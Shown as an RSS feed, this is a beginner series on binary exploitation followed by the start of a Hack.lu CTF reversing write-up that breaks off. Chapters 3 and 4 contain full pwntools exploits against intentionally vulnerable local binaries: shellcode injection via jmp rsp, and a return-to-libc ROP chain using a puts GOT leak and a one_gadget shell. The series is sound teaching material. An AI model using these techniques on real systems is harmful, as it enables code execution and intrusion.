RSS Security

πŸ”’
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayCTF

Binary Exploitation Series (4): Return to Libc

17 November 2018 at 00:00

This time we will activate non-executable stack and we’re going to build our first mini ROP-Chain to leak memory addresses! Basic ASLR is of course still enabled (only Heap and Stack randomized). I will also introduce some more features of pwntools.

Target

The target is again a simple binary where we can spot the vulnerability after a few seconds. In the function check_username we declare a 32-byte buffer to store a username. After that, we prompt the user to input a name but the fgets call reads up to 200 bytes which could lead again to a buffer overflow.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//gcc -m64 -o chapter_4 chapter_4.c -no-pie -fno-stack-protector

void check_username() {
    char name[32];

    puts("Name?");
    fgets(name, 200, stdin);

    if(strcmp(name, "admin\n") == 0) {
        puts("Nope. Invalid username.");
    }
    else {
        puts("OK");
    }
}

int main(int argc, char **argv) {
    check_username();
    return 0;
}

Analysis

Since we know a little bit about pwntools, thanks to the last post, and we have the source code of the target, we can directly start writing our exploit. First, import all pwntools functions and load the binary.

from pwn import *

r = process("./chapter_4")
context.binary = './chapter_4'

Then we will attach the debugger gdb again …

# attach gdb and continue
gdb.attach(r.pid, """c""")

… and we trigger the buffer overflow with a simple payload.

payload = "A"*50
r.sendline(payload)
r.interactive() # we don't want to close the application

Crashed, perfect!
Next, we try to find the offset to the return address on the stack. This can be done manually with static or dynamic analysis or we just use gdb and a really useful pwntools function. Let’s change the payload to payload = cyclic(50) and run it again. Crashed. Now we can compute the offset to the return address by taking a word (w) at the top of the stack (rsp) as an argument to pwntools’ cyclic_find function.

gef➀  x/wx $rsp
0x7ffecfec1e98:    0x6161616b

# ipython
In [1]: from pwn import *
In [2]: cyclic_find(0x6161616b)
Out[2]: 40

Ok, we have an offset of 40 to the return address of this function (32-byte buffer + 8 byte which is the saved base pointer).

Since we can’t execute our shellcode on the stack, we have to find another way. For now, we do the following steps to achieve code execution:

  • Leak libc pointers via GOT (Global Offset Table)
    • Leak pointer to puts
  • Identify libc library (optional, in this case not necessary)
    • Leak another pointer to fgets
    • Use leaked pointers of puts and fgets to find the correct libc
  • Compute libc’ base address
  • Find a suitable one-shot gadget to achieve code execution
  • Maybe find suitable gadgets to modify the registers for the one-shot gadget (in this case not necessary)
  • Redirect execution to the vulnerable function (otherwise the executable would exit)
  • Exploit the same vulnerability a second time and pop a shell!

First, we have to call the function puts with a GOT address as argument to read the pointer. We can also use pwntools to support us in our exploit development. Since we exploiting the program locally we can use ldd to obtain the used libc.

# Find the used libc (obviously our local libc since this is a local challenge)
ldd ./chapter_4
        linux-vdso.so.1 (0x00007fffe21a6000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f37310e9000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f37314da000)

Next, we load the libc in our python script for later use libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") and we use pwntools features to call puts with the correct address. Since puts uses one argument we have to set the rdi register (Read more about calling conventions).

# find a suitable gadget to set rdi
ROPgadget --binary chapter_4 | grep rdi
0x00000000004006b3 : pop rdi ; ret      <--------------------------
0x0000000000400594 : scasd eax, dword ptr [rdi] ; or ah, byte ptr [rax] ; add byte ptr [rcx], al ; pop rbp ; ret

We use the gadget to set the rdi register and call puts. This will print the address of the GOT entry and we can convert the leaked binary string to an integer with pwntools (u64(), 8 bytes unpack). Then we just have to subtract the offset of puts of our local libc to get the base address of the mapped libc in memory.

from pwn import *

def pad_null_bytes(value):
    return value + '\x00' * (8-len(value))

chapter_4_elf = ELF("./chapter_4")
r = chapter_4_elf.process()
context.binary = './chapter_4'

# libc
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# attach gdb and continue
gdb.attach(r.pid, """c""")

payload = "".join(["A"*40,
    p64(0x00000000004006b3), # pop rdi ; ret
    p64(chapter_4_elf.got["puts"]), # value for rdi
    p64(chapter_4_elf.symbols["puts"]), # return address
    "C"*50])

r.clean() # clean socket buffer (read all and print)
r.sendline(payload) # send payload
r.recvuntil("OK\n") # read until OK\n
puts_leak = u64(pad_null_bytes(r.readline())) # null byte padding + unpack to integer(8 byte)
log.info("Puts @ %s" % hex(puts_leak))

libc_base = puts_leak - libc.symbols["puts"] # compute libc base
log.info("libc base @ %s" % hex(libc_base))

r.interactive() # we don't want to close the application

Output of our script:

[+] Waiting for debugger: Done
[*] Puts @ 0x7f97bd13f9c0
[*] libc base @ 0x7f97bd0bf000      <----
[*] Switching to interactive mode

# Verify puts in gdb
p puts
$1 = {int (const char *)} 0x7f97bd13f9c0 <_IO_puts>   <----

# Verify libc base with vmmap
0x00007f97bd0bf000 0x00007f97bd2a6000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so   <----
0x00007f97bd2a6000 0x00007f97bd4a6000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007f97bd4a6000 0x00007f97bd4aa000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007f97bd4aa000 0x00007f97bd4ac000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so

Perfect, the addresses are the same!
If we don’t know the libc version we have to leak other addresses like fgets and strcmp and use blukat.me to identify the correct version. When we found the correct one, we can download the libc from the website. Since we do everything locally, we can just skip this part.

Before we look for a one-shot gadget, we need a way to interact with the binary after receiving the leaked addresses because ASLR would randomize the addresses on every startup again. Therefore, we just redirect the execution flow to the beginning and just exploit the buffer overflow a second time.

payload = "".join(["A"*40,
    p64(0x00000000004006b3), # pop rdi ; ret
    p64(chapter_4_elf.got["puts"]), # value for rdi
    p64(chapter_4_elf.symbols["puts"]), # return address
    p64(chapter_4_elf.symbols["main"]), # return to main
    "C"*50])

-->

Output:
[*] Puts @ 0x7f0fa54599c0
[*] libc base @ 0x7f0fa53d9000
[*] Switching to interactive mode
Name?
$  

Just copy the payload and send it again and we see the same crash as at the beginning!
Next, we have to identify a one-shot gadget. For that, we can use the program one_gadget with the identified libc.

one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c        execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

Ok, we have some constraints…
If we take a look at the stack in gdb after the program crashed, we can see that the second gadget should work with its constraints, because we control the C’s (43).

x/gx $rsp+0x40
0x7ffcc4538c98:    0x4343434343434343

-> change "C"*50 to "\x00"*100 and start the script again

x/gx $rsp+0x40
0x7ffe6cdff488:    0x0000000000000000

Let’s try it..

payload2 = "".join(["A"*40,
    p64(libc_base + one_gadget), # pop a shell
    "\x00"*100])
gef➀  c
Continuing.
process 9645 is executing new program: /bin/dash

We got it!

[+] Waiting for debugger: Done
[*] Puts @ 0x7f88bec589c0
[*] libc base @ 0x7f88bebd8000
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"sΒΎ\x88\x7f
OK
$ ls
chapter_4  chapter_4.c    chapter_4_exploit.py

Final exploit:

from pwn import *

def pad_null_bytes(value):
    return value + '\x00' * (8-len(value))

chapter_4_elf = ELF("./chapter_4")
r = chapter_4_elf.process()
context.binary = './chapter_4'

# libc
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# attach gdb and continue
gdb.attach(r.pid, """c""")
"""
one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c        execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
one_gadget = 0x4f322

payload = "".join(["A"*40,
    p64(0x00000000004006b3), # pop rdi ; ret
    p64(chapter_4_elf.got["puts"]), # value for rdi
    p64(chapter_4_elf.symbols["puts"]), # return address
    p64(chapter_4_elf.symbols["main"]), # return to main
    "C"*50])

r.clean()
r.sendline(payload)
r.recvuntil("OK\n")
puts_leak = u64(pad_null_bytes(r.readline()[:-1])) # remove newline + null byte padding + unpack to integer (8 byte)
log.info("Puts @ %s" % hex(puts_leak))

libc_base = puts_leak - libc.symbols["puts"]
log.info("libc base @ %s" % hex(libc_base))

payload2 = "".join(["A"*40,
    p64(libc_base + one_gadget), # pop a shell
    "\x00"*100])

r.clean()
r.sendline(payload2)

r.interactive() # we don't want to close the application

Please be patient with yourself and learn slowly, so that you understand everything correctly.

Happy Hacking!

Binary Exploitation Series (3): Your first Exploit

16 November 2018 at 00:00

Our first target is a really simple binary where we have basic ASLR enabled (only Heap and Stack are randomized). For this example, we will disable other protections like non-executable memory regions or PIE to make our stack overflow easier.

Target

The following code snippet is a simple C program that reads 200 bytes from stdin to a buffer which has only a size of 16 bytes. Therefore, we can write out of bounds. We compile the target with an executable stack and no other protections. Note, that ASLR is enabled because this is on today’s operation systems most of the time the case.

#include <stdio.h>
#include <stdlib.h>

//gcc -m64 -o chapter_3 chapter_3.c -no-pie -fno-stack-protector -z execstack -masm=intel
// help function to make this task easier, ignore it
void help() {
    asm("jmp rsp");
}

int main(int argc, char **argv) {
    char buffer[16];                   // 16 byte buffer
    fgets(buffer, 200, stdin);         // bug, we'll read 200 bytes into a 16 byte buffer
    return 0;                          // triggers return / return address is overflowed
}

Analysis

First, we load the binary into gdb.

gdb -q ./chapter_3
Reading symbols from ./chapter_3...(no debugging symbols found)...done.
gef➀  checksec # to check if there are any protections
[+] checksec for '/BinaryExploitationSeries/Chapter 3/chapter_3'
Canary                        : No
NX                            : No
PIE                           : No
Fortify                       : No
RelRO                         : Partial
gef➀  disassemble main
Dump of assembler code for function main:
   0x0000000000400527 <+0>:     push   rbp
   0x0000000000400528 <+1>:     mov    rbp,rsp
   0x000000000040052b <+4>:     sub    rsp,0x20
   0x000000000040052f <+8>:     mov    DWORD PTR [rbp-0x14],edi # arg1 argc
   0x0000000000400532 <+11>:    mov    QWORD PTR [rbp-0x20],rsi # arg2 argv
   0x0000000000400536 <+15>:    mov    rdx,QWORD PTR [rip+0x200af3]        # 0x601030 <[email protected]@GLIBC_2.2.5>
   0x000000000040053d <+22>:    lea    rax,[rbp-0x10] # buffer
   0x0000000000400541 <+26>:    mov    esi,0xc8 # count = 200
   0x0000000000400546 <+31>:    mov    rdi,rax
   0x0000000000400549 <+34>:    call   0x400430 <[email protected]>
   0x000000000040054e <+39>:    mov    eax,0x0 # return value = 0
   0x0000000000400553 <+44>:    leave  
   0x0000000000400554 <+45>:    ret    
End of assembler dump.

We can see at main+22 that our buffer is stored at rbp+0x10 and is used as an argument for fgets. Let’s try to overflow the buffer. For the payload generation we will use ipython.

Payload in ipython:
In [1]: "A"*16+"B"*8+"C"*8
Out[1]: 'AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC' # our payload
gef➀  run
Starting program: /BinaryExploitationSeries/Chapter 3/chapter_3
AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC # our payload
...
[#0] Id 1, Name: "chapter_3", stopped, reason: SIGSEGV # binary crashed

gef➀  x/gx $rbp
0x4242424242424242 # rbp is overwritten with B's

gef➀  x/gx $rsp # show a giant word (64-bit value) at $rsp (stack pointer)
0x7fffffffddb8:    0x4343434343434343
# binary tried to return to 8x C's which is forbidden since 64-bit Intel architecture only uses the first
# 6 bytes to address an instruction. (0x0000414141414141)

Let’s change the return address to a valid value.

Payload: AAAAAAAAAAAAAAAABBBBBBBBCCCCC # we only send 5x C's because we have a newline (0x0a) at the end
# we can get rid of the newline if we directly use python or pipe from a file

[#0] Id 1, Name: "chapter_3", stopped, reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x00000a4343434343 in ?? ()

# Now we have redirected execution to 0xa4343434343 which is an invalid address.
# We can verify the redirection with
gef➀  x/gx $rip
0xa4343434343

For the next steps, we put a breakpoint on the return instruction of the main to see our stack layout before returning.

b *main+45

Additionally, we provide some more data on the stack to have a better understanding of the data in the registers and on the stack.

New Payload: "A"*16+"B"*8+"C"*8+"D"*100

$rax   : 0x0               
$rbx   : 0x0               
$rcx   : 0x4444444444444444 ("DDDDDDDD"?)
$rdx   : 0x7ffff7dd18d0      β†’  0x0000000000000000
$rsp   : 0x7fffffffddb8      β†’  "CCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
$rbp   : 0x4242424242424242 ("BBBBBBBB"?)
$rsi   : 0x7fffffffdda0      β†’  "AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDDDDDDDDDDD[...]"
$rdi   : 0x7fffffffde25      β†’  0x0000000000000000
$rip   : 0x40055d            β†’  <main+45> ret
$r8    : 0x6022e5            β†’  0x0000000000000000
$r9    : 0x4444444444444444 ("DDDDDDDD"?)
$r10   : 0x4444444444444444 ("DDDDDDDD"?)
$r11   : 0x4444444444444444 ("DDDDDDDD"?)
$r12   : 0x400440            β†’  <_start+0> xor ebp, ebp
$r13   : 0x7fffffffde90      β†’  0x0000000000000001
$r14   : 0x0               
$r15   : 0x0               
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$gs: 0x0000  $ss: 0x002b  $cs: 0x0033  $es: 0x0000  $fs: 0x0000  $ds: 0x0000  
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffddb8β”‚+0x00: "CCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"     ← $rsp
0x00007fffffffddc0β”‚+0x08: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffddc8β”‚+0x10: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffddd0β”‚+0x18: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffddd8β”‚+0x20: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffdde0β”‚+0x28: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffdde8β”‚+0x30: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
0x00007fffffffddf0β”‚+0x38: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]"
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
     0x400552 <main+34>        call   0x400430 <[email protected]>
     0x400557 <main+39>        mov    eax, 0x0
     0x40055c <main+44>        leave  
 β†’   0x40055d <main+45>        ret    
[!] Cannot disassemble from $PC
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "chapter_3", stopped, reason: BREAKPOINT

Before you read any further, be sure that you understood what ASLR (Address Space Layout Randomization) and NX (Non-Executable Stack) means.

Since we have an executable stack, we can put our shellcode directly on the stack. The problem is, that we still have ASLR enabled and therefore, can’t reliably know where our shellcode is placed. To solve this problem, we can use a so-called gadget. Gadgets are small parts of an executable section (in general instructions of the .text section) which have always a return/jmp instruction (an instruction which redirects the execution flow) at the end.
For example:

Gadget1:
pop rdx # pull an 8-byte value from the top of the stack
ret # return

Gadget2:
mov rax, rsi
JMP rax

Now, the idea is, that we can use these gadgets for our purpose. If we place the address of gadget1 as the return address of our function we can redirect the execution flow to this gadget.

Where do we find these gadgets?
We could use manual analysis of the binary to find suitable gadgets but we can also do this automatically with ropper or ROPgadget.

For this target, we need a gadget that redirects the execution flow to our buffer (best case our D’s on the stack). If we look carefully, we can see that the jmp rsp gadget of our help function is available. This gadget is perfect, because after we triggered the overflow via ret the rsp register points to the first byte of our payload after the return address which is, in fact, the first D.

ROPgadget --binary chapter_3 | grep jmp
0x000000000040049e : adc byte ptr [rax], ah ; jmp rax
0x000000000040060d : add byte ptr [rax], al ; add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp
0x000000000040060f : add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp
0x000000000040060b : inc esp ; add byte ptr [rax], al ; add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp
0x0000000000400499 : je 0x4004b0 ; pop rbp ; mov edi, 0x601030 ; jmp rax
0x00000000004004db : je 0x4004f0 ; pop rbp ; mov edi, 0x601030 ; jmp rax
0x000000000040068b : jmp qword ptr [rax]
0x00000000004004a1 : jmp rax
0x000000000040052b : jmp rsp            <--------
0x0000000000400526 : mov dword ptr [rbp + 0x48], edx ; mov ebp, esp ; jmp rsp
0x0000000000400529 : mov ebp, esp ; jmp rsp
0x000000000040049c : mov edi, 0x601030 ; jmp rax
0x0000000000400528 : mov rbp, rsp ; jmp rsp
0x000000000040049b : pop rbp ; mov edi, 0x601030 ; jmp rax
0x0000000000400527 : push rbp ; mov rbp, rsp ; jmp rsp

Let’s write our first exploit:

from pwn import *

r = process("./chapter_3")
context.binary = './chapter_3'

# attach gdb and continue
gdb.attach(r.pid, """c""")

gadget = 0x000000000040052b # jmp rsp

payload = "A"*16+"B"*8
payload += p64(gadget) # return address, p64 converts our address to little endian because that's the correct representation in memory
# \xcc -> is a software breakpoint (int3). If our redirection of the execution worked, we should break
payload += "\xcc"*100

r.sendline(payload)
r.interactive() # we don't want to close the application

We can see in gdb that the target triggered a sigtrap while executing our buffer. Our gadget worked!
Now we just have to replace our buffer with real shellcode. This is very easy with pwntools because it has some shellcodes inbuilt.

from pwn import *

r = process("./chapter_3")
context.binary = './chapter_3'

# attach gdb and continue
gdb.attach(r.pid, """c""")

gadget = 0x000000000040052b # jmp rsp

payload = "A"*16+"B"*8
payload += p64(gadget) # return address, p64 converts our address to little endian because that's the correct representation in memory
# \xcc -> is a software breakpoint (int3). If our redirection of the execution worked, we should break
# payload += "\xcc"*100
payload += asm(shellcraft.sh()) # shellcode to spawn a shell

r.sendline(payload)
r.interactive() # we don't want to close the application
python chapter_3_exploit.py
[+] Starting local process './chapter_3': pid 5622
[*] '/BinaryExploitationSeries/Chapter 3/chapter_3'
   Arch:     amd64-64-little
   RelRO:    Partial RelRO
   Stack:    No canary found
   NX:       NX disabled
   PIE:      No PIE (0x400000)
   RWX:      Has RWX segments
[*] running in new terminal: /usr/bin/gdb -q  "/BinaryExploitationSeries/Chapter 3/chapter_3" 5622 -x "/tmp/pwne4TDcJ.gdb"
[+] Waiting for debugger: Done
[*] Switching to interactive mode
$ ls
chapter_3  chapter_3.c    chapter_3_exploit.py
$  

Yeah, we popped our first shell!


The next post will be about bypassing non-executable stack aka return to libc and a small information leak.
Happy Hacking!

Binary Exploitation Series (2): Bug Classes

15 November 2018 at 00:00

This post gives a brief overview of some bug classes, but it will not cover everything in detail. I’ll provide some additional resources for bug classes which I’m not covering in this series.

How to find vulnerabilities?

There are two essential ways to identify vulnerabilities in software. Fuzzing and static/dynamic code analysis. While fuzzing is a more β€œaggressive” way of spamming different test cases against the program, an audit is a more focused task. In CTF’s I prefer the manual analysis of the target because most of the time bugs are somewhat hidden and you can find a magic value easier with a disassembler instead of random inputs as test cases.

Bug Classes

There are many different possible attack vectors in today’s native binaries. I won’t cover all of them but to give you an idea, here is a small list:

  • Stack Buffer Overflows
  • Heap Buffer Overflows
  • Format String Attacks
  • Use After Free (UAF)
  • Information Leaks (e.g. Format String Attacks, Off by One)
  • Logic Flaws
  • …

Stack Based Buffer Overflows

Stack-based buffer overflows are (often) a simple way to get code execution on the target. The best way to explain such an attack is with an example, like always. ;-)
The following function is treated as 32-bit (architecture).

void vuln_function(char *input) {
    char local_buffer[32];
    strcpy(local_buffer, input);
}

The main idea of a buffer overflow is that we can write out of bounds of a variable e.g. an array. This means, that we can fill a buffer on the stack (here 32 bytes) with more data than it can store.

In the following figure, we see the stack of the above function. ESP is the stack pointer and EBP is the base pointer.

If we have β€œAAAA\0” as an input, the stack is as follows:

If we put more data than the buffer can hold (e.g. "A"*32 + "B"*4 + "C"*4) we can overwrite the saved base pointer and the return address of the function.

As soon as we return from the function (ret) the C’s will be used as the next instruction pointer and we get a SEGFAULT. Therefore, we know that something is corrupted and we may have control of the execution flow (without protections enabled, see later chapters). Important to note, that you could overwrite other variables too. That means, that perhaps you do not need to overwrite the return address because overwriting a specific variable on the stack is enough to achieve your goal.

Heap Exploitation

Heap-based buffer overflows are in general the same as stack-based buffer overflows, but you are overflowing a buffer on the heap. Therefore, you cannot directly overwrite e.g. a return address but rather have to figure out how the application works. Then you can manipulate other variables like pointer to strings (you’ll maybe get a write/read primitive), heap metadata and even function pointers on the heap (e.g. a struct which has pointers to other functions) to get control over the execution flow.
I can recommend How2Heap which covers a lot of heap exploitation techniques.

Format String Attacks

Format strings can be used in a few functions like printf.

char *name = "MyName";
int age = 34;
printf("%s is %d years old.", name, age);

In this example, we have a format string (arg1) and we replace the %s with the content of the second argument name and the %d formatter with the value of age. The vulnerability occurs if we let the user manipulate or even set the format string.
For example:

char buf[30];
int count = read(0, buf, 29);
buf[count] = '\0';
printf(buf); // buffer could contain formatter -> %x %s %c ...

When we put the string %x%x%x as a buffer for printf we can leak data of the stack. We can also read arbitrary addresses and also write to arbitrary addresses in memory. You can read more about this type of exploitation at Format String Attacks syr.edu or watch a video of LiveOverflow
Look out for functions like: printf, sprintf, vprintf, vsprintf, ….


That’s it for today. Next time, we’ll finally exploit our first target!

See you soon.

Binary Exploitation Series (1): Environment Setup

8 November 2018 at 00:00

Foreword

This series will cover some basic exploitation techniques on Linux systems (x64) which are getting more advanced during the series. The main focus will be on bypassing protection mechanisms of modern systems like ASLR, non-executable stack, Stack Cookies and position-independent code. Each technical topic will be hands-on and I will provide an example to try it yourself and follow along.

Overview

The following table shows some topics I will write about and it might be updated over time.

Chapter Topic Active Protections
1 Environment Setup -
2 Bug Classes -
3 Your first Exploit ASLR
4 Return 2 Libc ASLR, NX
5 How to leak data? Mixed
6 Defeating Stack Cookies ASLR, NX, Stack Cookies
7 Full RelRO Bypass ASLR, NX, Stack Cookies, Full RelRO

Introduction

Today’s post will cover a basic setup for a virtual environment to do some pwnable challenges. This is not the only setup and a lot of people will have better or other tools in their collection. But for me, it is a good base for most of the pwnables I do.

Disclaimer: I’m not a professional and therefore, some things could be wrong or could be done better. But let’s hope it is good enough! ;-)

Base System

As a host system, you can use whatever you want. Windows, Linux, MacOS or something else will do the work.

Virtual Machines

Virtual machines are the best way to have a running system that can be compromised and later be restored to an earlier state. Therefore, I would recommend to not run the vulnerable code on your main systems and build your virtual environment where you can safely run vulnerable code. Moreover, it is very convenient to roll back your system in case of a bad behavior of some of the executables or if the system is damaged in a way.

Virtualization Software:

  • VMWare Workstation (Pro), most students get a free copy
  • VirtualBox, free and open-source
  • Hyper-V, comes with Win10-Pro
  • …

OS Choice

Since most of the challenges are for Linux based systems, I would recommend to set up your custom virtual environment with a vanilla Linux like Ubuntu.

Tools

Tools are an essential part of your pwn-environment because you will need some! In the following, I will describe some useful tools which I often use.

ipython

A good interactive python shell with tab completion and highlighting.

gdb

Debugging in Linux is done with gdb and I will not cover each command here because there are many tutorials available.

gdb-Plugin: GEF

GEF is a great plugin for gdb which extends the debugging functionalities. Other plugins almost do the same as pwndbg and PEDA. I’ve decided that GEF is the right choice for me but feel free to try each one yourself.
Some important commands we’ll use quite often:

  • Print memory
    eXamine memory: x/FMT ADDRESS.
    Example: x/10gx $rsp
    This command will print 10 times a 8 byte value (g = giant word - 8 byte, w = word - 4 byte), starting from the address in rsp.
    More information at gdb Manuals

  • set follow-fork-mode child
    gdb follows a fork to debug the child process. It is essential for debugging a socket server which forks its process on each connection.
    Command: set follow-fork-mode child

  • search-pattern
    Easily find strings or your payload in the programs memory.
    Command: search-pattern 'AAAAAAA'`

  • vmmap
    Display a comprehensive layout of the virtual memory mapping.

More information at GEF-Docs.

strace / ltrace

For a basic overview of the binary, you can use strace and ltrace. strace is a program to trace system calls and show all received signals of a given binary. ltrace does the same just with library calls. (e.g. read(..), fgets(…))

Both tools are also great for reversing challenges because sometimes you might see some plaintext strings in function calls.

Pwntools

Pwntools is a great collection of tools/functions packed into a library for python. It is designed for rapid prototyping (which I can confirm) and it makes your exploit development for different tasks a lot easier.
A basic script could look like this:

from pwntools import *

r = process("./challenge")
r.sendline("Hello")
print r.recvline()
r.interactive()

A big advantage of this plugin is that the communication with processes, network sockets or other protocols like ssh uses the same interface. Therefore, you can easily develop your exploit against a local target with r = process("challenge") and later change one line to exploit the remote service r = remote("192.168.1.42", 1337).

Binary Ninja

Binary Ninja is a really great and especially affordable reverse engineering tool. It comes with a good disassembler, medium level and low-level intermediate languages and a great python API interface to develop your plugins for binary ninja.
Further, you have some useful plugins already available at Binary Ninja Community Plugins.

Radare2

Radare2 is also a great tool for reversing but it is kind of hard to begin with since it is a command-line tool. radare2

IDA Free

Another possible disassembler would be IDA free. Since this is a demo version the functionalities are a little bit restricted. But for a beginner, it is enough. IDA Free.

ROPgadget / Ropper

ROPgagdet looks for gadgets in a binary to build a ROP chain and it supports different architectures and file formats.
Ropper does almost the same.

One Gadget

One Gagdet allows you to spawn a shell with execve('/bin/sh', NULL, NULL) via libc in one shot! Therefore, you only need to leak the libc base address in the target’s memory and redirect code execution to the gadget.

Libc Database

Libc Database builds a database of libc offsets to identify used libc on the target machine. You have to be able to leak some libc pointers (e.g. via read primitive and GOT (Global Offset Table) addresses). A web-based variant is available at blukat.me.


That’s all for the first post.

See you soon.

Hack.lu 2018: Baby Reverse

19 October 2018 at 00:00

Baby reverse was a beginner reversing challenge of this year’s hack.lu CTF. It was a great beginner challenge for people who are new to reversing at all.

A really cool fact was that the challenge author provided some basic β€œtodo” list to solve the challenge.

Hey there, future Reverser!

We created this small challenge to introduce you to reverse engineering. This task might _still_ take quite some time, but trust us, it will be very rewarding!
We sadly can't spoonfeed you, but we created a set of questions that you might want to answer yourself. We expect you to google on your own and find resources.

Sooo, lets get started!

- What kind of binary have you got infront of you? (Hint: "file" command)
- How can you disassemble the file? (objdump, gdb, radare...)
- Which programs are common debuggers?
- How can I use them? (we recommend gdb with the peda plugin)
- - how can I set breakpoints?
- - in which different ways can I step through programs?
- - how can I print/examine the content of memory/addresses
- what is inside registers? what's rax, rip, rsp?
- what is the linux syscall convention?
- - In which register is the second argument?
- - In which register is the syscall number?
- - - where can I find the syscall numbers on my own linux system?
- what happens at a call instruction?
- how can I compare strings in assembly?
- .. ask your teammates for more! annoy them if anything is unclear :P
- .. if you don't got any teammates, use IRC and say that it's about the baby challenge

There is a lot of work ahead of you, and maybe some sleepless nights with a lot of googling - but it will be worth it;-)!
We are certain that with a dedicated mind you can solve this task and from there on you'll be ready for a bright future!
Don't give up, we all have been there. Stick to it and you'll be rewarded =)

Therefore, a beginner could just follow the notes and try to figure out what the program does.

Analysis of the Program

The first command we use is file to find out which architecture the binary supports.

file chall
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

We have a 64-bit binary and for that reason, we have 64-bit registers and we have to use registers for function calls. Next, we run the binary to see what it does. This is a very important step to get a general overview of a challenge.

./chall
Welcome to this Chall!
Enter the Key to win: AAAA

Okay, we can enter some data and then the program exits.

Let’s open the challenge in gdb. In my case, I will use GEF as a gdb plugin instead of peda as recommended by the todo list.

gdb ./chall
gef> start          # runs until the program is loaded

Further, we can step through the program with si (step into) to execute each instruction and have the ability to follow function calls. If we don’t want to follow function calls, we could use ni (not into). While stepping through the program, we can observe, that at some point the instructions are repeating. That means, that we have entered a loop and since the loop contains an XOR instruction, we can guess, that this is some sort of β€œencoding” algorithm.

Let’s restart the program and find out where our input is stored. If we step through the code, we can observe two syscalls at the beginning. The first syscall prints the message Welcome to this Chall!. We can find the syscall number in the rax register and look the syscall number up (SyscallTable64Bit).

First syscall:
rax = 1 -> write
rsi = 0x4000d7  β†’ "Welcome to this Chall! \nEnter the Key to win:"
It prints the message we saw earlier.

Second syscall:
rax = 0 -> read
rsi = 0x4000d7  β†’ "Welcome to this Chall! \nEnter the Key to win:"
This means that we read (from stdin) to our buffer at rsi. So basically, we write new data in the message buffer.

Afterward, we enter the following loop:

0x400098                  movzx  rdi, BYTE PTR [rsi+0x1]
0x40009d                  xor    QWORD PTR [rsi], rdi
0x4000a0                  inc    rsi
0x4000a3                  dec    rdx
0x4000a6                  jne    0x400098

The loop iterates over our message buffer (with our input) and XORs the current indexed character with the next one in the buffer and writes the result to the currently indexed character. Let the buffer be ABCD.
The algorithm will perform the following operations:

A = 0x41
B = 0x42
C = 0x43
D = 0x44
buffer = {0x41, 0x42, 0x43, 0x44}
i = index (incremented by the algorithm)
buffer[i] = buffer[i] ^ buffer[i+1] ( = 0x41^0x42 = 0x03 )
i = i + 1
buffer[i] = buffer[i] ^ buffer[i+1] ( = 0x42^0x43 = 0x01 )
...

Further, we can observe a loop index (rdx) which is decremented in each iteration. If rdx becomes zero, the loop exits at jne 0x400098

After the loop ends we can see a comparison between two buffers repz cmps BYTE PTR ds:[rsi], BYTE PTR es:[rdi]. If we recall the algorithm, we know that our buffer is referenced by rsi and therefore rdi should be another buffer. Since these two buffers should be equal we can guess that this buffer contains the β€œencoded” flag.

Developing a Solution

To solve this problem, we first step in gdb until the comparison and copy the content of the other buffer.

 gef➀  x/10gx $rdi
